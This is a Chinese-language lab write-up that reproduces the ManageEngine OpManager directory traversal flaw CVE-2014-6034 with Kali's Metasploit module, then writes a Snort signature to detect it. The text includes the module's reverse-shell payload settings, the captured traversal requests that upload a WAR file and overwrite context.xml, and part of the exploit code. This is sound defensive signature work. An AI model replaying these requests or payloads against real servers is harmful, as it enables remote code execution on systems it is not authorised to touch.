本文以CVE 2014-6034为例进行漏洞分析与验证,包括环境搭建抓包,特征提取验证各个环节。
1、下载软件:
ManageEngine OpManager 9
地址:http://manageengine-opmanager.soft32.com/
Kali Linux
https://www.kali.org/downloads/
我下载在是Kali Linux 64 bit ISO 1.0.9a ISO
2、环境搭建
ManageEngine OpManager 9 直接点击安装即可,安装过程中会告诉启动的port默认为8060端口,我们可以通过a.b.c.d:8060来访问此软件。
Kali Linux需要建一个虚拟机,建议用VMware即可,属于deban类型。
Kali Linux安装后需要更新一下系统安装更新,步驟如下:如果不是root用戶必須使用sudo进行相关命令操作。
要求虚拟机和OpManager软件所在的机器为同一网段。
a、更新软件源:
修改sources.list文件:
leafpad /etc/apt/sources.list
然后选择添加以下适合自己较快的源(可自由选择,不一定要全部):
#官方源deb http://http.kali.org/kali kali main non-free contribdeb-src
http://http.kali.org/kali kali main non-free contribdeb
http://security.kali.org/kali-security kali/updates main contrib non-free#激进源,新手不推荐使用这个软件源deb
http://repo.kali.org/kali kali-bleeding-edge maindeb-src
http://repo.kali.org/kali kali-bleeding-edge main#中科大kali源deb
http://mirrors.ustc.edu.cn/kali kali main non-free contribdeb-src
http://mirrors.ustc.edu.cn/kali kali main non-free contribdeb
http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib non-free#阿里云kali源deb
http://mirrors.aliyun.com/kali kali main
non-free contribdeb-src http://mirrors.aliyun.com/kali kali main non-free contribdeb http://mirrors.aliyun.com/kali-security
kali/updates main contrib non-free保存之后运行:
apt-get update #刷新系统
apt-get dist-upgrade #安装更新
b、Metasploit Framework设置
依照kali linux网络服务策略,Kali没有自动启动的网络服务,包括数据库服务在内。所以为了让metasploit以支持数据库的方式运行有些必要的步骤
。
启动Kali的PostgreSQL服务:Metasploit 使用PostgreSQL作为数据库,所以必须先运行它。
service postgresql start
可以用 ss -ant 的输出来检验PostgreSQL是否在运行,然后确认5432端口处于listening状态。
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 :::22 :::*8
LISTEN 0 128 *:22 *:*3
LISTEN 0 128 127.0.0.1:5432 *:*4
LISTEN 0 128 ::1:5432 :::*
启动Kali的Metasploit服务:随着PostgreSQL的启动和运行,接着我们要运行Metasploit服务。第一次运行服务会创建一个msf3数据库用户和一个叫
msf3的数据库。还会运行Metasploit RPC和它需要的WEB 服务端。
service metasploit start
在Kali运行msfconsole:现在PostgreSQL 和 Metasploit服务都运行了,可以运行 msfconsole,然后用 db_status 命令检验数据库的连通性。
msf > db_status
[*] postgresql connected to msf3
msf >
配置Metasploit随系统启动运行:如果你想PostgreSQL和Metasploit在开机时运行,你可以使用update-rc.d启用服务。
update-rc.d postgresql enable
update-rc.d metasploit enable
介绍一下metasploit一些常用命令,search(搜索漏洞利用信息及脚本),use(使用某个模块),show options(显示此模块所必须的选项) set [option]
xx设置选项,exploit(启动利用)
3、验证抓包:
下载漏洞利用脚本,地址http://www.scap.org.cn/CVE-2014-6034.html进入packetstorm下载rb脚本文件,将此文件上传到/usr/share/metasploit-framework/modules/exploits/windows/http目录,重新启动msfconsole后利用search命令搜索opmanager,然后进行设置利用即可。
msf exploit(opmanager_socialit_file_upload) > search opmanage
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/http/opmanager_socialit_file_upload 2014-09-27 excellent ManageEngine OpManager / Social IT Arbitrary File Upload
msf exploit(opmanager_socialit_file_upload) > show options
Module options (exploit/windows/http/opmanager_socialit_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST 192.168.83.166 yes The target address
RPORT 8060 yes The target port
SLEEP 15 yes Seconds to sleep while we wait for WAR deployment
VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.83.175 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal
msf exploit(opmanager_socialit_file_upload) > exploit
4、抓取报文内容如下:
第一个包:
POST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=Uw71PQDsCqCtUDrcKJhv.war HTTP/1.1
Host: 192.168.83.166:8060
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/octet-stream
Content-Length: 6469
第二个包:
POST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/conf&FILENAME=context.xml HTTP/1.1
Host: 192.168.83.166:8060
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/xml
Content-Length: 125
<?xml version=‘1.0‘ encoding=‘utf-8‘?><Context privileged="true"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>
由利用脚本可知,第一次不成功是继续探测
def exploit
app_base = rand_text_alphanumeric(4 + rand(32 - 4))
upload_war_and_exec(false, app_base)
register_files_for_cleanup("tomcat/webapps/" + "#{app_base}.war")
sleep_counter = 0
while not session_created?
if sleep_counter == datastore[‘SLEEP‘]
print_error("#{peer} - Failed to get a shell, let‘s try one more time")
upload_war_and_exec(true, app_base)
return
end
sleep(1)
sleep_counter += 1
end
5、snort特征提取验证
#flow:to_server,established;
alert tcp any any -> any 8060 (msg:"Directory traversal vulnerability in the com.me.opmanager.extranet.remote.communication.fw.fe.Fil
eCollector servlet in ZOHO ManageEngine OpManager 8.8 through 11.3, Social IT Plus 11.0, and IT360 10.4 and earlier allows remote att
ackers or remote authenticated users to write to and execute arbitrary WAR files via a .. (dot dot) in the regionID parameter."; cont
ent:"com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector"; nocase; content:"FILENAME=";nocase;within:45;pcre:"/regionI
D=\.\./\.\./\.\./.*/i";reference:cve,2014-6034; sid:1089;rev:1)
6、执行snort查看告警信息如下:
snort -r ../pkt/2014-6034_kalitowindows_exploit_succ_pkt_jyh_001.pcap -c snort.conf -l log/ -A console
01/08-20:53:18.917122 [**] [1:1089:1] Directory traversal vulnerability in the com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector servlet in ZOHO ManageEngine OpManager 8.8 through 11.3, Social IT Plus 11.0, and IT360 10.4 and earlier allows
remote attackers or remote authenticated users to write to and execute arbitrary WAR files via a .. (dot dot) in the regionID parameter. [**] [Priority: 0] {TCP} 192.168.83.175:44845 -> 192.168.83.166:8060